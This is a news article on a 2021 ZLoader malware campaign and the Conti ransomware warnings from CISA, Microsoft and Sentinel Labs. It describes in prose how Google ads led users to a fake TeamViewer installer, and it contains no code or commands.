The U.S. government and the tech industry is warning of an increase in the use of Conti ransomware, including in more than 400 attacks on U.S. and international organizations, including those in healthcare, first responders, and other critical organizations.
The Cybersecurity and Infrastructure Security Agency released an advisory this week, and Microsoft and Sentinel Labs also released information about the increased use of Conti ransomware that is being downloaded through a Google advertisement published through Google Adwords.
Threat actors are leveraging ZLoader, a banking trojan first discovered in2016, to distribute the malware. According to Sentinel Labs, ZLoader implements web injection to steal cookies, passwords and sensitive information, provides backdoor capabilities and acts as a generic loader for other forms of malware.
“Newer versions implement a VNC module which permits users to open a hidden channel that gives the operators remote access to victim systems,” according to a Sentinel Labs report. “ZLoader relies primarily on dynamic data exchange (DDE) and macro obfuscation to deliver the final payload through crafted documents.”
The cybersecurity firm further says the infection chain has evolved to include the dynamic creation of agents which download the payload from a remote server.
“The new infection chain observed by Sentinel Labs demonstrates a higher level of stealth by disabling Windows Defender and relying on living-off-the-land binaries and scripts (LOLBAS) in order to evade detection,” the company said. “During our investigation, we were also able to map all the new ZLoader C2 infrastructure related to the ‘Tim’ botnet and identify the scope of the campaign and its objectives, which primarily involved stealing bank credentials from customers of European banks.”
In this campaign, a user does a Google search to find a website to download software. In one case, a user searched for a legitimate TeamViewer download, but clicked an advertisement shown by Google and is redirected to the fake TeamViewer site under the attacker’s control, according to Sentinel Labs.
The user is then tricked into downloading the fake software in a signed MSI format.
The Microsoft Security Intelligence Twitter account has further details on this attack:
While analyzing ZLoader campaigns in early September, we observed a notable shift in delivery method: from the traditional email campaigns to the abuse of online ad platforms. Attackers purchased ads pointing to websites that host malware posing as legitimate installers. pic.twitter.com/8HkR4kmyO6
— Microsoft Security Intelligence (@MsftSecIntel) September 23, 2021